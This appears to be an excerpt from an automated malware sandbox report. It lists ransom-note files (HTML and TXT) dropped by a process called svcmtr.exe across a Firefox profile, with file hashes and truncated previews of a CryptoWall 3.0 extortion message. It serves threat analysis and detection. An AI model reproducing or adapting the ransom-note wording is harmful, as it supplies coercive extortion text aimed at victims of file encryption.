                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\simple-storage\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\simple-storage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\minidumps\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\minidumps\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8942
                                                                                                                          Entropy (8bit):7.972373498955242
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoDWzKHDkyezOWRM2xoIckldMICkv3N3JU32dIJMKU7:GuRDk1z1RM2xoIvldMmv3vU2dI257
                                                                                                                          MD5:0F243A10FE034FCA9F71209F9924A182
                                                                                                                          SHA1:B04D0F2BC3B3E9989E4D4102BBD373CE3B687D1A
                                                                                                                          SHA-256:7219C0AE5D683599BDF3F30910D12C40F0E46ABA41D3262A0EA6C67915E314B1
                                                                                                                          SHA-512:84FF2B862F739D953AC7A40D049D80C251066FB42DC5A8EBFBE892FBBE87A246E029CD73AC2B3AE06B63E4FC15CF6FDC57F9D69C8D543721091C17D63030CF36
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..`.3y.....l-...C!...^..HN.....RgH.su.G.W_./...4M.J#Z&.r.....KB....l..hl..v.^..mx..Q.S/..-M`.>.C......W....F..@hK`hy-.e..=*.AG.`._.~.`......t...1.Y..F....LeA...T.2..W.6...j..v...br..._.".....O..Z"...6.j[^..y.~..!...Z1......W.'...q.....Y...73N.T..ea..@..,].s...+..\.....K...O.%G.|'j..'OV...'......J*GgV.Sd.5.R...._.xRgh`A.vkz*....lApCUw...J.......'%.b./F..s.......'..s..C.?>....2...].raU.4.?.(R.E...O.l...,....0...t..b..6p.9=m.....g.]Z.. ..,...\..!.~._...)'....J*p...7nSF.p.#3..La.Nh..V".....D...2k..g.N.6.U....j.Q....3..V!ni..a*t.z...}.....|C.m.1v....X..-....^4.F.......6I,.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\saved-telemetry-pings\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\saved-telemetry-pings\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\sessionstore-backups\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\sessionstore-backups\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\2918063365piupsah.files\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\2918063365piupsah.files\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

